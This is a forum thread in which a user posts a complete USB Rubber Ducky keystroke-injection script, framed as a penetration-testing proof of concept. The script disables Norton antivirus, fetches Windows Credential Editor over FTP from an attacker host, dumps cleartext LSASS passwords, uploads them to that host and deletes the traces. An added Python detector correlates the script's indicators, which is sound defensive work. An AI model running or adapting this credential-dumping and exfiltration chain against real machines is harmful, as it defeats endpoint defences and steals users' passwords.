tellerman5 Posted January 5, 2013

Hi Folks, I wanted to share a new script I developed that shows a proof of concept for a Rubber Ducky and Windows Credential Editor (WCE) script that would do the following:

1.) Disable Antivirus for 15 minutes, which is the default. (This must be done to avoid signature detection of the WCE executable.)
2.) FTP to the attacker machine on the network, downloading the 32-bit & 64-bit versions of WCE.
3.) The script then executes both versions, sending the output to a text file with the computer name as the variable of the file name. Note: One executable will fail (64- or 32-bit), but it will not write to the output file.
4.) The script will then upload the file containing cleartext passwords for users logged in, based on LSASS memory.
5.) The script will then remove all WCE executables as well as the cleartext password file created before the antivirus program automatically starts. Then it closes all appropriate windows.

The video demo can be found at: http://youtu.be/IqUci4buvvM

Below is a copy of the script. Note: This is a proof of concept and will need to be tweaked per environment and penetration testing engagement.

----------------------------------------------------------------------------------------------------------------------------------------------
code below:

REM ######################################################################################################
REM # Author: G1                                                                                        #
REM # OS Designed and Tested on: Windows 7 SP1 x64                                                      #
REM # Anti-Virus Version: Norton Security Suite v 6.4.0.9 on Windows 7 OS                               #
REM # FTP Platform: Backtrack 5 R3 / PureFTPD                                                           #
REM # Rubber Ducky Encoder Required: Use Dnucna's 2.1 or greater                                        #
REM # http://code.google.com/p/ducky-decode/downloads/list                                              #
REM #                                                                                                    #
REM # This script was developed and intended to capture cleartext credentials stored in LSASS via      #
REM # Windows Credential Editor (WCE). The method process below contains these main sections:          #
REM #                                                                                                    #
REM # 1.) Disable Antivirus for 15 minutes, which is the default. (This must be done to avoid signature #
REM #     detection of WCE executables.)                                                                 #
REM # 2.) FTP to the attacker machine on the network, downloading the 32-bit & 64-bit versions of WCE   #
REM # 3.) The script then executes both versions, sending the output to a text file with the computer  #
REM #     name as the variable of the file name. Note: One executable will fail (64- or 32-bit), but it #
REM #     will not write to the output file.                                                             #
REM # 4.) The script will then upload the file containing cleartext passwords for users logged in,     #
REM #     based on LSASS memory                                                                          #
REM # 5.) The script will then remove all WCE executables as well as the cleartext password file       #
REM #     created before the antivirus program automatically starts. Then it closes all appropriate    #
REM #     windows.                                                                                       #
REM #                                                                                                    #
REM # Prerequisites:                                                                                     #
REM #   - User of the targeted system MUST have ADMINISTRATOR level access.                             #
REM #   - Attacker must maintain a copy of the 32-bit and 64-bit versions of WCE in their FTP directory #
REM #   - Attacker's FTP server must have at least one directory that is writable.                      #
REM #                                                                                                    #
REM # This script is meant as a guide and proof of concept of the USB Rubber Ducky. Tweaks for AV       #
REM # versions, FTP versions and delay times may vary depending on the environment.                     #
REM #                                                                                                    #
REM ######################################################################################################
REM
REM ***********************************************************************************
REM ****************NORTON-SECURITY-SUITE-N360*****************************************
REM **********ANTI-VIRUS-VERSION-6.4.0.9--OS:Windows7**********************************
REM ******************15-Minute-Disable************************************************
REM ***********************************************************************************
DELAY 1000
CTRL ESCAPE
DELAY 200
STRING Norton Security Suite
DELAY 100
ENTER
DELAY 3000
TAB
DELAY 500
ENTER
DELAY 2500
TAB
TAB
DELAY 50
ENTER
DELAY 2500
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
DELAY 500
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
TAB
TAB
DELAY 50
ENTER
DELAY 500
SHIFT TAB
DELAY 50
ENTER
DELAY 3000
SHIFT TAB
DELAY 100
ENTER
DELAY 2000
SHIFT TAB
DELAY 100
ENTER
DELAY 1000
ALT F4
REM ***********************************************************************************
REM ********************END-OF-NORTON-AV-DISABLE***************************************
REM ***********************************************************************************
REM -------------------------------------
REM ***********************************************************************************
REM FTP spawn to retrieve Windows Credential Editor 32-bit and 64-bit executables (wce.exe and wce_64.exe)
REM ***********************************************************************************
REM ***********************************************************************************
DELAY 500
CTRL ESCAPE
DELAY 200
STRING cmd
DELAY 1500
CTRL-SHIFT ENTER
DELAY 4000
LEFT
DELAY 100
ENTER
DELAY 1000
STRING ftp 192.168.1.140
ENTER
DELAY 1000
REM FTP USERNAME below
STRING <FTP USER>
ENTER
DELAY 500
REM FTP User password
STRING <FTP PASSWORD>
ENTER
DELAY 700
STRING binary
ENTER
DELAY 100
STRING prompt
ENTER
DELAY 100
REM Assuming the wce.exe and wce_64.exe are in the root directory of the FTP server.
STRING mget wce*
ENTER
DELAY 1000
REM ***********************************************************************************
REM ***********************************************************************************
REM Opening second Administrative command window to process FTP executables
REM ***********************************************************************************
REM ***********************************************************************************
CTRL ESCAPE
DELAY 200
STRING cmd
DELAY 1500
CTRL-SHIFT ENTER
DELAY 4000
LEFT
DELAY 100
ENTER
DELAY 1000
REM ***********************************************************************************
REM ***********************************************************************************
REM Pulling cleartext credentials for 64-bit and saving the file as %computername%-cleartext-PWs-64bit.txt
REM ***********************************************************************************
REM ***********************************************************************************
STRING wce_64.exe -w -o %computername%-cleartext-PWs-64bit.txt
ENTER
DELAY 3000
REM ***********************************************************************************
REM ***********************************************************************************
REM Pulling cleartext credentials for 32-bit and saving the file as %computername%-cleartext-PWs-32bit.txt
REM ***********************************************************************************
REM ***********************************************************************************
STRING wce.exe -w -o %computername%-cleartext-PWs-32bit.txt
ENTER
DELAY 3000
ALT TAB
REM ***********************************************************************************
REM ***********************************************************************************
REM Back to FTP session on initial command window, entering writable directory for upload
REM ***********************************************************************************
REM ***********************************************************************************
DELAY 200
STRING cd upload
ENTER
DELAY 100
REM ***********************************************************************************
REM ***********************************************************************************
REM Upload all cleartext password files from the Windows Credential Editor command.
REM ***********************************************************************************
REM ***********************************************************************************
STRING mput *cleartext-PWs*
ENTER
DELAY 2000
STRING quit
ENTER
DELAY 500
STRING exit
ENTER
DELAY 50
REM ***********************************************************************************
REM ***********************************************************************************
REM Cleaning up the files created and exiting command windows.
REM ***********************************************************************************
REM ***********************************************************************************
STRING del wce.exe wce_64.exe %computername%-cleartext-PWs-64bit.txt %computername%-cleartext-PWs-32bit.txt
ENTER
DELAY 100
STRING exit
ENTER
------------------------------------------------------------------------------------------------------------------------

Edited February 6, 2013 by midnitesnake: corrected formatting
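From the defender's side, the chain in the post above leaves a recognizable trail on the host: an elevated cmd.exe, ftp to a raw IP on the LAN, two binaries named wce.exe and wce_64.exe, the "-w -o" arguments, and output files matching *cleartext-PWs-*. The script below is an added example (not part of tellerman5's post, and not code from WCE or the Ducky project) that correlates those indicators per host inside the 15-minute window the script itself relies on. The pipe-delimited event layout, the host names, the timestamps and the weights are all constructed assumptions for the demo.

```python
"""Detection logic for the keystroke-injected WCE-over-FTP chain above.

Added example; it is not part of the forum post or of any product.
The events below are constructed, and the pipe-delimited field layout
(timestamp|host|kind|detail) is an assumption, not a real log schema.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    ts: int       # seconds since epoch (constructed values)
    host: str
    kind: str     # "process" (command line) or "file" (path created)
    detail: str


# Constructed sample log: WS-042 shows the full chain from the posted script,
# WS-077 shows ordinary activity that must not alert.
SAMPLE_LOG = """\
1357380000|WS-042|process|C:\\Windows\\System32\\cmd.exe
1357380012|WS-042|process|ftp 192.168.1.140
1357380030|WS-042|file|C:\\Users\\alice\\wce_64.exe
1357380031|WS-042|file|C:\\Users\\alice\\wce.exe
1357380045|WS-042|process|wce_64.exe -w -o WS-042-cleartext-PWs-64bit.txt
1357380049|WS-042|file|C:\\Users\\alice\\WS-042-cleartext-PWs-64bit.txt
1357380050|WS-042|process|wce.exe -w -o WS-042-cleartext-PWs-32bit.txt
1357380100|WS-077|process|ftp files.example.internal
1357380200|WS-077|process|notepad.exe C:\\Users\\bob\\notes.txt
"""

# (rule name, weight, pattern). The patterns are the file names and arguments
# the posted script uses verbatim, so they catch this script as written; a
# renamed binary or output file evades the name rules, which is why the
# weaker "ftp to a raw IP" rule and the time window are still correlated.
RULES = [
    ("wce_binary_name", 3, re.compile(r"(^|[\\/ ])wce(_64)?\.exe\b", re.I)),
    ("wce_dump_args", 4, re.compile(r"\s-w\b.*\s-o\s", re.I)),
    ("cleartext_pw_file", 5, re.compile(r"cleartext-PWs-(32|64)bit\.txt", re.I)),
    ("ftp_to_raw_ip", 2, re.compile(r"^ftp\s+\d{1,3}(\.\d{1,3}){3}\b", re.I)),
]
ALERT_THRESHOLD = 6          # assumption: tune to the environment
WINDOW_SECONDS = 15 * 60     # the script depends on a 15-minute AV pause


def parse_events(text):
    """Parse pipe-delimited lines into Event objects, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, kind, detail = line.split("|", 3)
        events.append(Event(int(ts), host, kind, detail))
    return events


def match_rules(event):
    """Return the names of every rule whose pattern hits this event."""
    return [name for name, _, pat in RULES if pat.search(event.detail)]


def score_hosts(events):
    """Per host, the best score of distinct rules seen inside one window.

    Returns {host: (score, sorted rule names)}. Distinct rules are counted
    once per window so that repeated hits do not inflate the score.
    """
    weights = {name: w for name, w, _ in RULES}
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        hits = match_rules(ev)
        if hits:
            by_host[ev.host].append((ev.ts, hits))
    scores = {ev.host: (0, []) for ev in events}
    for host, flagged in by_host.items():
        for i, (start_ts, _) in enumerate(flagged):
            seen = set()
            for ts, hits in flagged[i:]:
                if ts - start_ts > WINDOW_SECONDS:
                    break
                seen.update(hits)
            score = sum(weights[n] for n in seen)
            if score > scores[host][0]:
                scores[host] = (score, sorted(seen))
    return scores


def alerts(events, threshold=ALERT_THRESHOLD):
    """Hosts whose windowed score reaches the threshold, sorted by name."""
    return sorted(h for h, (s, _) in score_hosts(events).items() if s >= threshold)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for host, (score, rules) in sorted(score_hosts(evs).items()):
        print(f"{host}: score={score} rules={rules}")
    print("alerting hosts:", alerts(evs))
```

On the constructed log, WS-042 trips all four rules inside one window and alerts, while WS-077's ftp to a hostname and notepad launch score zero. The name-based rules are the weakest part of this: they match the post's script exactly and nothing else, so in practice the durable signals are the behaviour (an AV pause followed by an elevated shell, an LSASS-reading process and an outbound FTP transfer within minutes) rather than the strings.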
no42 Posted January 5, 2013

Nice PoC and Vid.

Edited January 5, 2013 by midnitesnake
tellerman5 Posted January 5, 2013 (Author)

Hey Midnitesnake - thanks for the correction! Sorry I misspelled your name in the comments as well. :-P You and Dnucna keep up the great work on the platform. Really enjoying this additional perspective for my team's pentest activities. Cheers! G1
Dnucna Posted January 5, 2013

Hi tellerman5, You are welcome! I'm happy to see a useful application of ctrl-shift :) Dnu